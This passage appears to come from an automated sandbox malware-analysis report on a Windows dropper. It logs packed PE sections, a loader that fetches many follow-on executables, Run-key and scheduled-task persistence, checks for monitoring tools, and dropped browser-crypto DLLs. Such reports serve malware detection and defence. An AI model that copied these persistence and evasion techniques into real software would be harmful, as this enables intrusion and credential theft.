                    Source: random[1].exe.5.dr Static PE information: section name:
                    Source: random[1].exe.5.dr Static PE information: section name: wekcazbo
                    Source: random[1].exe.5.dr Static PE information: section name: ttllozcv
                    Source: random[1].exe.5.dr Static PE information: section name: .taggant
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name:
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name: .idata
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name:
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name: wekcazbo
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name: ttllozcv
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name: .taggant
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: random[1].exe0.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr Static PE information: section name:
                    Source: random[1].exe1.5.dr Static PE information: section name:
                    Source: random[1].exe1.5.dr Static PE information: section name: .rsrc
                    Source: random[1].exe1.5.dr Static PE information: section name: .idata
                    Source: random[1].exe1.5.dr Static PE information: section name: ibdqnddj
                    Source: random[1].exe1.5.dr Static PE information: section name: izikvcoa
                    Source: random[1].exe1.5.dr Static PE information: section name: .taggant
                    Source: random[2].exe.5.dr Static PE information: section name: .fptable
                    Source: ba944ca4ff.exe.5.dr Static PE information: section name: .fptable
                    Source: random[1].exe2.5.dr Static PE information: section name:
                    Source: random[1].exe2.5.dr Static PE information: section name: .idata
                    Source: random[1].exe2.5.dr Static PE information: section name:
                    Source: random[1].exe2.5.dr Static PE information: section name: aseoxclk
                    Source: random[1].exe2.5.dr Static PE information: section name: dunhoeap
                    Source: random[1].exe2.5.dr Static PE information: section name: .taggant
                    Source: b285303eae.exe.5.dr Static PE information: section name:
                    Source: b285303eae.exe.5.dr Static PE information: section name: .idata
                    Source: b285303eae.exe.5.dr Static PE information: section name:
                    Source: b285303eae.exe.5.dr Static PE information: section name: aseoxclk
                    Source: b285303eae.exe.5.dr Static PE information: section name: dunhoeap
                    Source: b285303eae.exe.5.dr Static PE information: section name: .taggant
                    Source: random[3].exe0.5.dr Static PE information: section name:
                    Source: random[3].exe0.5.dr Static PE information: section name: .idata
                    Source: random[3].exe0.5.dr Static PE information: section name:
                    Source: random[3].exe0.5.dr Static PE information: section name: qppoenam
                    Source: random[3].exe0.5.dr Static PE information: section name: qzwmqxvv
                    Source: random[3].exe0.5.dr Static PE information: section name: .taggant
                    Source: b9ba85c997.exe.5.dr Static PE information: section name:
                    Source: b9ba85c997.exe.5.dr Static PE information: section name: .idata
                    Source: b9ba85c997.exe.5.dr Static PE information: section name:
                    Source: b9ba85c997.exe.5.dr Static PE information: section name: qppoenam
                    Source: b9ba85c997.exe.5.dr Static PE information: section name: qzwmqxvv
                    Source: b9ba85c997.exe.5.dr Static PE information: section name: .taggant
                    Source: random[2].exe2.5.dr Static PE information: section name:
                    Source: random[2].exe2.5.dr Static PE information: section name: .idata
                    Source: random[2].exe2.5.dr Static PE information: section name: esuubaeu
                    Source: random[2].exe2.5.dr Static PE information: section name: sfvezqry
                    Source: random[2].exe2.5.dr Static PE information: section name: .taggant
                    Source: e6e4c20fad.exe.5.dr Static PE information: section name:
                    Source: e6e4c20fad.exe.5.dr Static PE information: section name: .idata
                    Source: e6e4c20fad.exe.5.dr Static PE information: section name: esuubaeu
                    Source: e6e4c20fad.exe.5.dr Static PE information: section name: sfvezqry
                    Source: e6e4c20fad.exe.5.dr Static PE information: section name: .taggant
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name:
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name: .idata
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name:
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name: wekcazbo
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name: ttllozcv
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name: .taggant
                    Source: random[3].exe2.5.dr Static PE information: section name:
                    Source: random[3].exe2.5.dr Static PE information: section name: .idata
                    Source: random[3].exe2.5.dr Static PE information: section name: rqcwpexm
                    Source: random[3].exe2.5.dr Static PE information: section name: viefdblt
                    Source: random[3].exe2.5.dr Static PE information: section name: .taggant
                    Source: 96e283ac77.exe.5.dr Static PE information: section name:
                    Source: 96e283ac77.exe.5.dr Static PE information: section name: .idata
                    Source: 96e283ac77.exe.5.dr Static PE information: section name: rqcwpexm
                    Source: 96e283ac77.exe.5.dr Static PE information: section name: viefdblt
                    Source: 96e283ac77.exe.5.dr Static PE information: section name: .taggant
                    Source: 6b06c8a266.exe.5.dr Static PE information: section name:
                    Source: 6b06c8a266.exe.5.dr Static PE information: section name: .idata
                    Source: 6b06c8a266.exe.5.dr Static PE information: section name:
                    Source: 6b06c8a266.exe.5.dr Static PE information: section name: xyfieepk
                    Source: 6b06c8a266.exe.5.dr Static PE information: section name: lpcplxjb
                    Source: 6b06c8a266.exe.5.dr Static PE information: section name: .taggant
                    Source: random[4].exe0.5.dr Static PE information: section name:
                    Source: random[4].exe0.5.dr Static PE information: section name: .idata
                    Source: random[4].exe0.5.dr Static PE information: section name:
                    Source: random[4].exe0.5.dr Static PE information: section name: uiswpquv
                    Source: random[4].exe0.5.dr Static PE information: section name: ziulmwng
                    Source: random[4].exe0.5.dr Static PE information: section name: .taggant
                    Source: 24da220eed.exe.5.dr Static PE information: section name:
                    Source: 24da220eed.exe.5.dr Static PE information: section name: .idata
                    Source: 24da220eed.exe.5.dr Static PE information: section name:
                    Source: 24da220eed.exe.5.dr Static PE information: section name: uiswpquv
                    Source: 24da220eed.exe.5.dr Static PE information: section name: ziulmwng
                    Source: 24da220eed.exe.5.dr Static PE information: section name: .taggant
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr Static PE information: section name:
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr Static PE information: section name: .idata
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr Static PE information: section name: rqcwpexm
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr Static PE information: section name: viefdblt
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr Static PE information: section name: .taggant
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr Static PE information: section name:
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr Static PE information: section name: .idata
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr Static PE information: section name: esuubaeu
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr Static PE information: section name: sfvezqry
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr Static PE information: section name: .taggant
                    Source: freebl3.dll.31.dr Static PE information: section name: .00cfg
                    Source: freebl3[1].dll.31.dr Static PE information: section name: .00cfg
                    Source: mozglue.dll.31.dr Static PE information: section name: .00cfg
                    Source: mozglue[1].dll.31.dr Static PE information: section name: .00cfg
                    Source: msvcp140.dll.31.dr Static PE information: section name: .didat
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Code function: 0_2_00B1D91C push ecx; ret 0_2_00B1D92F
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Code function: 0_2_00B11359 push es; ret 0_2_00B1135A
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00BED91C push ecx; ret 2_2_00BED92F
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00BED91C push ecx; ret 3_2_00BED92F
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_3_00C00D50 pushfd ; retf 9_3_00C00D51
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_3_00C01120 push ecx; retf 9_3_00C0112A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_3_00BF057D push eax; ret 9_3_00BF0581
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_3_00BEEE69 pushfd ; iretd 9_3_00BEFA84
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_3_00BFE73C push FFFFFF85h; retf 9_3_00BFE812
                    Source: cMTqzvmx9u.exe Static PE information: section name: entropy: 6.951830958774063
                    Source: skotes.exe.0.dr Static PE information: section name: entropy: 6.951830958774063
                    Source: 7620ab885d.exe.5.dr Static PE information: section name: entropy: 7.986463733135728
                    Source: random[3].exe.5.dr Static PE information: section name: xyfieepk entropy: 7.9542694260581
                    Source: random[1].exe.5.dr Static PE information: section name: entropy: 7.980952558000639
                    Source: random[1].exe.5.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name: entropy: 7.980952558000639
                    Source: 8469cb4d4d.exe.5.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
                    Source: random[1].exe1.5.dr Static PE information: section name: entropy: 7.986463733135728
                    Source: random[1].exe2.5.dr Static PE information: section name: entropy: 7.9770039853719545
                    Source: random[1].exe2.5.dr Static PE information: section name: aseoxclk entropy: 7.953504917666834
                    Source: b285303eae.exe.5.dr Static PE information: section name: entropy: 7.9770039853719545
                    Source: b285303eae.exe.5.dr Static PE information: section name: aseoxclk entropy: 7.953504917666834
                    Source: random[3].exe0.5.dr Static PE information: section name: entropy: 7.9824607911183225
                    Source: random[3].exe0.5.dr Static PE information: section name: qppoenam entropy: 7.953050880306917
                    Source: b9ba85c997.exe.5.dr Static PE information: section name: entropy: 7.9824607911183225
                    Source: b9ba85c997.exe.5.dr Static PE information: section name: qppoenam entropy: 7.953050880306917
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name: entropy: 7.980952558000639
                    Source: f53b3c5fe2.exe.5.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
                    Source: 6b06c8a266.exe.5.dr Static PE information: section name: xyfieepk entropy: 7.9542694260581
                    Source: random[4].exe0.5.dr Static PE information: section name: uiswpquv entropy: 7.9490516523806445
                    Source: 24da220eed.exe.5.dr Static PE information: section name: uiswpquv entropy: 7.9490516523806445

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe File created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\ProgramData\mozglue.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\ProgramData\softokn3.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe File created: C:\Program Files\Windows Media Player\graph\graph.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\ProgramData\nss3.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe File created: C:\Users\user\AppData\Local\Temp\MZHUJDVAZFQBUC9CQYK.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\ProgramData\freebl3.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[3].exe
                    Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe
                    Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe File created: C:\Users\user\AppData\Local\Temp\E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\ProgramData\msvcp140.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\ProgramData\vcruntime140.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021722001\aa8c9de034.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[3].exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 96e283ac77.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e6e4c20fad.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fb584dabd7.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b9ba85c997.exe
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe File created: C:\Windows\Tasks\skotes.job
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
